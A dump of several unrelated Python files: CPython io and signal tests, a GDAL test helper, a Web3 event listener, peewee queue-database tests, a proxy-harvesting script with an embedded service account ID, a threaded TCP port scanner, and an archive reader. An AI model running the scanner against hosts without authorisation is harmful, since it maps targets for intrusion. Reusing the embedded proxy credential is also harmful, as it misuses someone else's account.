@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
gdaltest_python3.py
|
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Python Library supporting GDAL/OGR Test Suite
# Author: Even Rouault, <even dot rouault at spatialys.com>
#
###############################################################################
# Copyright (c) 2003, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2009-2013, Even Rouault <even dot rouault at spatialys.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import urllib.request
import urllib.error
import urllib.parse
import socket
import subprocess
import shlex
import os
import sys
from queue import Queue
from threading import Thread
def run_func(func):
try:
result = func()
print(result)
return result
except SystemExit as x:
import traceback
traceback.print_exc()
raise x
except Exception:
# We really do want to catch most exceptions percolating up to here
# pylint: disable=broad-except
result = 'fail (blowup)'
print(result)
import traceback
traceback.print_exc()
return result
def urlescape(url):
# Escape any non-ASCII characters
try:
import urllib
url = urllib.parse.quote(url)
except AttributeError:
pass
return url
def gdalurlopen(url, timeout=10):
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
proxy = None
if 'GDAL_HTTP_PROXY' in os.environ:
proxy = os.environ['GDAL_HTTP_PROXY']
protocol = 'http'
if 'GDAL_HTTPS_PROXY' in os.environ and url.startswith('https'):
proxy = os.environ['GDAL_HTTPS_PROXY']
protocol = 'https'
if proxy is not None:
if 'GDAL_HTTP_PROXYUSERPWD' in os.environ:
proxyuserpwd = os.environ['GDAL_HTTP_PROXYUSERPWD']
proxyHandler = urllib.request.ProxyHandler({"%s" % protocol:
"%s://%s@%s" % (protocol, proxyuserpwd, proxy)})
else:
proxyuserpwd = None
proxyHandler = urllib.request.ProxyHandler({"%s" % protocol:
"%s://%s" % (protocol, proxy)})
opener = urllib.request.build_opener(proxyHandler, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)
try:
handle = urllib.request.urlopen(url)
socket.setdefaulttimeout(old_timeout)
return handle
except urllib.error.HTTPError as e:
print('HTTP service for %s is down (HTTP Error: %d)' % (url, e.code))
socket.setdefaulttimeout(old_timeout)
return None
except urllib.error.URLError as e:
print('HTTP service for %s is down (URL Error: %s)' % (url, e.reason))
socket.setdefaulttimeout(old_timeout)
return None
except urllib.error.ContentTooShort:
print('HTTP content too short for %s.' % url)
socket.setdefaulttimeout(old_timeout)
return None
def spawn_async(cmd):
command = shlex.split(cmd)
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE)
return (process, process.stdout)
except OSError:
return (None, None)
def wait_process(process):
process.wait()
def runexternal(cmd, strin=None, check_memleak=True, display_live_on_parent_stdout=False, encoding='latin1'):
# pylint: disable=unused-argument
command = shlex.split(cmd)
if strin is None:
p = subprocess.Popen(command, stdout=subprocess.PIPE)
else:
p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(bytes(strin, 'ascii'))
p.stdin.close()
if p.stdout is not None:
if display_live_on_parent_stdout:
ret = ''
ret_stdout = p.stdout
while True:
c = ret_stdout.read(1).decode(encoding)
if c == '':
break
ret = ret + c
sys.stdout.write(c)
else:
ret = p.stdout.read().decode(encoding)
else:
ret = ''
waitcode = p.wait()
if waitcode != 0:
ret = ret + '\nERROR ret code = %d' % waitcode
return ret
def read_in_thread(f, q):
q.put(f.read())
f.close()
def runexternal_out_and_err(cmd, check_memleak=True, encoding='ascii'):
# pylint: disable=unused-argument
command = shlex.split(cmd)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.stdout is not None:
q_stdout = Queue()
t_stdout = Thread(target=read_in_thread, args=(p.stdout, q_stdout))
t_stdout.start()
else:
q_stdout = None
ret_stdout = ''
if p.stderr is not None:
q_stderr = Queue()
t_stderr = Thread(target=read_in_thread, args=(p.stderr, q_stderr))
t_stderr.start()
else:
q_stderr = None
ret_stderr = ''
if q_stdout is not None:
ret_stdout = q_stdout.get().decode(encoding)
if q_stderr is not None:
ret_stderr = q_stderr.get().decode(encoding)
waitcode = p.wait()
if waitcode != 0:
ret_stderr = ret_stderr + '\nERROR ret code = %d' % waitcode
return (ret_stdout, ret_stderr)
|
root_event_listener.py
|
import time
import random
import json
import threading
from web3 import Web3, HTTPProvider
from hashlib import sha256
from hexbytes import HexBytes
from web3.utils.datastructures import AttributeDict
import pickle
class RootEventListener(object):
"""Listens to events on the root chain.
We abstract the logic for listening to events because
we only want events to be acted upon once they're considered
finalized. Events are known to be missed accidentally sometimes,
so we try to make event listening more robust.
Args:
root_chain (ConciseContract): A Web3 ConciseContract representing the root chain.
w3 (Web3): A Web3 object.
finality (int): Number of blocks before events should be considered final.
"""
def __init__(self, root_chain, w3=Web3(HTTPProvider('http://localhost:8545')), confirmations=6):
self.root_chain = root_chain
self.w3 = w3
self.confirmations = confirmations
self.seen_events = {}
self.active_events = {}
self.subscribers = {}
self.__listen_for_event('Deposit')
self.__listen_for_event('ExitStarted')
self.__listen_for_event('MsgSender')
self.__listen_for_event('FinalState')
self.__listen_for_event('forDebug01')
def on(self, event_name, event_handler):
"""Registers an event handler to an event by name.
Event handlers are passed the Web3 Event dict.
Args:
event_name (str): Name of the event to listen to.
event_handler (function): A function to call when the event is caught.
"""
self.subscribers[event_name].append(event_handler)
def __listen_for_event(self, event_name):
"""Registers an event as being watched for and starts a filter loop.
Args:
event_name (str): Name of the event to watch for.
"""
self.subscribers[event_name] = []
self.active_events[event_name] = True
threading.Thread(target=self.filter_loop, args=(event_name,)).start()
def stop_listening_for_event(self, event_name):
"""Stops watching for a certain event.
Args:
event_name (str): Name of event to deregister.
"""
del self.active_events[event_name]
def stop_all(self):
"""Stops watching for all events
"""
for event in list(self.active_events):
self.stop_listening_for_event(event)
def filter_loop(self, event_name):
"""Starts a filter loop to broadcast events.
Note that we only watch for events that occur between
`confirmations` and `confirmations * 2`. This is important because
we never want a client to act on an event that isn't
finalized. We might catch the same event twice, so we hash
each event and make sure we haven't seen that event yet before
broadcasting
Args:
event_name (str): Name of event to watch.
"""
while event_name in self.active_events:
current_block = self.w3.eth.getBlock('latest')
event_filter = self.root_chain.eventFilter(event_name, {
'fromBlock': current_block['number'] - (self.confirmations * 2 + 1),
'toBlock': current_block['number'] + 1 - self.confirmations
})
for event in event_filter.get_all_entries():
event_hash = self.__hash_event(event)
if event_hash not in self.seen_events:
self.seen_events[event_hash] = True
self.broadcast_event(event_name, event)
time.sleep(random.random())
def broadcast_event(self, event_name, event):
"""Broadcasts an event to all subscribers.
Args:
event_name (str): Name of event to broadcast.
event (dict): Event data to broadcast.
"""
for subscriber in self.subscribers[event_name]:
subscriber(event)
def __hash_event(self, event):
"""Returns the sha256 hash of an event dict.
Args:
event (dict): Event dict to hash.
Returns:
str: Hexadecimal hash string.
"""
# HACK: Be able to JSON serialize the AttributeDict/HexBytes objects https://github.com/ethereum/web3.py/issues/782
class CustomJsonEncoder(json.JSONEncoder):
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, AttributeDict):
return obj.__dict__
if isinstance(obj, HexBytes):
return obj.hex()
return super().default(obj)
#stringified_event = json.dumps(dict(event), sort_keys=True, cls=CustomJsonEncoder)
stringified_event = pickle.dumps(event)
#return sha256(stringified_event.encode()).hexdigest()
return sha256(stringified_event).hexdigest()
|
test_sqliteq.py
|
from functools import partial
import os
import sys
import threading
import time
import unittest
try:
import gevent
from gevent.event import Event as GreenEvent
except ImportError:
gevent = None
from peewee import *
from playhouse.sqliteq import ResultTimeout
from playhouse.sqliteq import SqliteQueueDatabase
from playhouse.sqliteq import WriterPaused
from playhouse.tests.base import database_initializer
from playhouse.tests.base import PeeweeTestCase
from playhouse.tests.base import skip_if
get_db = partial(
database_initializer.get_database,
'sqlite',
db_class=SqliteQueueDatabase)
db = database_initializer.get_database('sqlite')
class User(Model):
name = TextField(unique=True)
class Meta:
database = db
db_table = 'threaded_db_test_user'
class BaseTestQueueDatabase(object):
database_config = {}
n_rows = 50
n_threads = 20
def setUp(self):
super(BaseTestQueueDatabase, self).setUp()
with db.execution_context():
User.create_table(True)
User._meta.database = \
self.db = get_db(**self.database_config)
# Sanity check at startup.
self.assertEqual(self.db.queue_size(), 0)
def tearDown(self):
super(BaseTestQueueDatabase, self).tearDown()
User._meta.database = db
with db.execution_context():
User.drop_table()
if not self.db.is_closed():
self.db.close()
if not db.is_closed():
db.close()
filename = db.database
if os.path.exists(filename):
os.unlink(filename)
def test_query_error(self):
self.db.start()
curs = self.db.execute_sql('foo bar baz')
self.assertRaises(OperationalError, curs.fetchone)
self.db.stop()
def test_query_execution(self):
qr = User.select().execute()
self.assertEqual(self.db.queue_size(), 0)
self.db.start()
users = list(qr)
huey = User.create(name='huey')
mickey = User.create(name='mickey')
self.assertTrue(huey.id is not None)
self.assertTrue(mickey.id is not None)
self.assertEqual(self.db.queue_size(), 0)
self.db.stop()
def create_thread(self, fn, *args):
raise NotImplementedError
def create_event(self):
raise NotImplementedError
def test_multiple_threads(self):
def create_rows(idx, nrows):
for i in range(idx, idx + nrows):
User.create(name='u-%s' % i)
total = self.n_threads * self.n_rows
self.db.start()
threads = [self.create_thread(create_rows, i, self.n_rows)
for i in range(0, total, self.n_rows)]
[t.start() for t in threads]
[t.join() for t in threads]
self.assertEqual(User.select().count(), total)
self.db.stop()
def test_pause(self):
event_a = self.create_event()
event_b = self.create_event()
def create_user(name, event, expect_paused):
event.wait()
if expect_paused:
self.assertRaises(WriterPaused, lambda: User.create(name=name))
else:
User.create(name=name)
self.db.start()
t_a = self.create_thread(create_user, 'a', event_a, True)
t_a.start()
t_b = self.create_thread(create_user, 'b', event_b, False)
t_b.start()
User.create(name='c')
self.assertEqual(User.select().count(), 1)
# Pause operations but preserve the writer thread/connection.
self.db.pause()
event_a.set()
self.assertEqual(User.select().count(), 1)
t_a.join()
self.db.unpause()
self.assertEqual(User.select().count(), 1)
event_b.set()
t_b.join()
self.assertEqual(User.select().count(), 2)
self.db.stop()
def test_restart(self):
self.db.start()
User.create(name='a')
self.db.stop()
self.db._results_timeout = 0.0001
self.assertRaises(ResultTimeout, User.create, name='b')
self.assertEqual(User.select().count(), 1)
self.db.start() # Will execute the pending "b" INSERT.
self.db._results_timeout = None
User.create(name='c')
self.assertEqual(User.select().count(), 3)
self.assertEqual(sorted(u.name for u in User.select()),
['a', 'b', 'c'])
def test_waiting(self):
D = {}
def create_user(name):
D[name] = User.create(name=name).id
threads = [self.create_thread(create_user, name)
for name in ('huey', 'charlie', 'zaizee')]
[t.start() for t in threads]
def get_users():
D['users'] = [(user.id, user.name) for user in User.select()]
tg = self.create_thread(get_users)
tg.start()
threads.append(tg)
self.db.start()
[t.join() for t in threads]
self.db.stop()
self.assertEqual(sorted(D), ['charlie', 'huey', 'users', 'zaizee'])
def test_next_method(self):
self.db.start()
User.create(name='mickey')
User.create(name='huey')
query = iter(User.select().order_by(User.name))
self.assertEqual(next(query).name, 'huey')
self.assertEqual(next(query).name, 'mickey')
self.assertRaises(StopIteration, lambda: next(query))
self.assertEqual(
next(self.db.execute_sql('PRAGMA journal_mode'))[0],
'wal')
self.db.stop()
class TestThreadedDatabaseThreads(BaseTestQueueDatabase, PeeweeTestCase):
database_config = {'use_gevent': False}
def tearDown(self):
self.db._results_timeout = None
super(TestThreadedDatabaseThreads, self).tearDown()
def create_thread(self, fn, *args):
t = threading.Thread(target=fn, args=args)
t.daemon = True
return t
def create_event(self):
return threading.Event()
def test_timeout(self):
@self.db.func()
def slow(n):
time.sleep(n)
return 'I slept for %s seconds' % n
self.db.start()
# Make the result timeout very small, then call our function which
# will cause the query results to time-out.
self.db._results_timeout = 0.001
self.assertRaises(
ResultTimeout,
lambda: self.db.execute_sql('select slow(?)', (0.005,)).fetchone())
self.db.stop()
@skip_if(lambda: gevent is None)
class TestThreadedDatabaseGreenlets(BaseTestQueueDatabase, PeeweeTestCase):
database_config = {'use_gevent': True}
n_rows = 20
n_threads = 200
def create_thread(self, fn, *args):
return gevent.Greenlet(fn, *args)
def create_event(self):
return GreenEvent()
if __name__ == '__main__':
unittest.main(argv=sys.argv)
|
Grab_proxy_xundaili_zh.py
|
import requests
import json
import time
from threading import Thread
from .RedisClient import RedisClient
from logconfig import LogConfig
import logging
from logging.config import dictConfig
config = LogConfig(info_file=r'grabInfo.log', err_file=r'grabErr.log').log_config
logging.config.dictConfig(config)
info_logger = logging.getLogger("info_log")
err_logger = logging.getLogger("err_log")
def connect_check(proxies):
ping_url = 'http://www.baidu.com'
try:
status_code = requests.get(ping_url, proxies=proxies, timeout=3).status_code
if status_code == 200:
return True
else:
return False
except Exception as e:
print(e)
return False
def store_proxies(proxies):
conn = RedisClient(name='certificate_proxies')
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
conn_check = connect_check(proxies)
if conn_check:
proxies = json.dumps(proxies)
duplicate_check = conn.exist(proxies)
if not duplicate_check:
conn.set(proxies, 1)
print('NNNNN: ', proxies)
info_logger.info(str(now) + ' New proxies: ' + str(proxies))
else:
info_logger.info(str(now) + ' Already exist proxies: ' + str(proxies))
else:
err_logger.error(str(now) + ' Can not connect baidu.com -- proxies: ' + str(proxies))
def download_proxies():
url = 'http://www.xdaili.cn/ipagent/privateProxy/applyStaticProxy' \
'?count=1&spiderId=fd4708592c97444c9f42060c500649ac&returnType=2'
'http://www.xdaili.cn/ipagent/privateProxy/applyStaticProxy?count=1&spiderId=fd4708592c97444c9f42060c500649ac&returnType=2'
content = requests.get(url).json()
error_code = content.get('ERRORCODE', '')
if error_code in ['10055', '10036', '10038']:
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
err_logger.error(str(now) + str(' 提取太频繁,请按规定频率提取!'))
time.sleep(15)
return []
print('xundaili resp content: ', content)
proxies_list = []
for proxy in content['RESULT']:
ip = proxy['ip']
port = proxy['port']
proxies = {
'http': 'http://%s:%s' % (ip, port),
'https': 'http://%s:%s' % (ip, port),
}
proxies_list.append(proxies)
return proxies_list
def main():
while True:
try:
begin = time.time()
proxies_list = download_proxies()
total = len(proxies_list)
for i in range(total):
proxies = proxies_list[i]
t = Thread(target=store_proxies, args=(proxies, ))
t.start()
t.join()
end = time.time()
if end - begin > 15:
continue
else:
time.sleep(15.5-(end - begin))
except Exception as e:
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
err_logger.error(str(now) + str(e))
time.sleep(10)
if __name__ == '__main__':
main()
|
SimplePortScanner.py
|
import optparse
import socket
from socket import *
from threading import *
def connScan(Host, tgtPort):
try:
#initiates TCP connection
connSkt = socket(AF_INET, SOCK_STREAM)
connSkt.connect((Host, tgtPort))
print('[+] Port %d: Open' % (tgtPort))
connSkt.close()
except:
pass
def portScan(Host, tgtPorts):
try:
tgtIP = gethostbyname(Host)
except:
print("[-] Cannot resolve '%s': Unknown host" % (Host))
return
try:
tgtName = gethostbyaddr(tgtIP)
print('\n[+] Scan Results for : ' + tgtName[0])
except:
print('\n[+] Scan Results for : ' + tgtIP)
setdefaulttimeout(1)
#start a new thread when scanning for each port (makes port scan run a bit faster)
#calls connScan function
for tgtPort in tgtPorts:
t = Thread(target=connScan, args=(Host, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser('usage %prog -H ' +\
'<target host> ')
parser.add_option('-H', dest='Host', type='string', \
help='specify target host')
(options, args) = parser.parse_args()
Host = options.Host
#scans all ports
tgtPorts = range(65535)
#if there is no host option in cmdline
if(Host == None):
print(parser.usage)
exit(0)
portScan(Host, tgtPorts)
if __name__ == '__main__':
main()
|
__init__.py
|
import os
import zstandard
import ujson as json
import time
import tarfile
import codecs
from functools import reduce
import jsonlines
import io
from zipfile import ZipFile
import gzip
from math import ceil
import mmap
import multiprocessing as mp
def listdir_or_file(x):
if isinstance(x, list):
return reduce(lambda x,y:x+y, map(listdir_or_file, sorted(x)))
return [x] if os.path.isfile(x) else [x + '/' + fn for fn in sorted(os.listdir(x))]
def tarfile_reader(file, streaming=False):
# we need our own tarfile parser because `tarfile` doesn't work well for
# big tarfiles; it seems to be reading the entire file to get a list of
# where all the files are - but we don't need that because we just need
# to see each file once. surprisingly, `tarfile` doesn't expose any
# facilities for this. the only options are 1. load the entire tarfile
# and then query by filename or 2. extract to disk - and neither of
# these is what we want.
offset = 0
paxfilesize = None
while True:
hdr = file.read(512)
offset += 512
# https://www.gnu.org/software/tar/manual/html_node/Standard.html
# end at 135 not 136 because of \0 terminator
if hdr[124:135] == b'\0'*11:
# end of record
break
fname = hdr[:100].split(b'\0')[0]
# if the file is too big to fit in the size field, tarfiles will actually
# include a PaxHeader with the size in it, applicable to the immediate next file.
if paxfilesize is not None:
size = paxfilesize
paxfilesize = None
else:
size = int(hdr[124:135], 8)
padded_size = ceil(size / 512) * 512
# for handling PaxHeader files (which contain extra metadata about file size) and directories
# https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_03
type = chr(hdr[156])
if type == 'x':
meta = file.read(padded_size)[:size]
def kv(x):
return x.decode('utf-8').split(' ')[1].split('=')
paxfileattrs = {
kv(x)[0]: kv(x)[1]
for x in meta.split(b'\n') if x
}
paxfilesize = int(paxfileattrs['size'])
offset += padded_size
continue
elif type != '0' and type != '\0':
if streaming:
file.seek(padded_size, os.SEEK_CUR)
else:
file.read(padded_size)
offset += padded_size
continue
if streaming:
# skip directory entries
if size != 0:
mmo = mmap.mmap(file.fileno(), length=offset + size, access=mmap.ACCESS_READ)
mmo.seek(offset)
yield mmo
file.seek(padded_size, os.SEEK_CUR)
else:
yield file.read(padded_size)[:size]
offset += padded_size
def handle_jsonl(jsonl_reader, get_meta, autojoin_paragraphs, para_joiner, key='text'):
for ob in jsonl_reader:
# naive jsonl where each object is just the string itself, with no meta. For legacy compatibility.
if isinstance(ob, str):
assert not get_meta
yield ob
continue
text = ob[key]
if autojoin_paragraphs and isinstance(text, list):
text = para_joiner.join(text)
if get_meta:
yield text, (ob['meta'] if 'meta' in ob else {})
else:
yield text
class Reader:
def __init__(self, in_path):
self.in_path = in_path
def stream_data(self, get_meta=False, threaded=False):
if not threaded:
yield from self._stream_data(get_meta)
return
q = mp.Queue(1000)
p = mp.Process(target=self._stream_data_threaded, args=(q, get_meta))
p.start()
while p.is_alive():
res = q.get()
if res is None: break
yield res
def _stream_data_threaded(self, q, get_meta=False):
for data in self._stream_data(get_meta):
q.put(data)
q.put(None)
def _stream_data(self, get_meta=False, jsonl_key="text"):
self.f_name = ""
for f in listdir_or_file(self.in_path):
self.f_name = f
if f == 'openwebtext.tar.xz':
assert not get_meta
yield from self.read_owt(f)
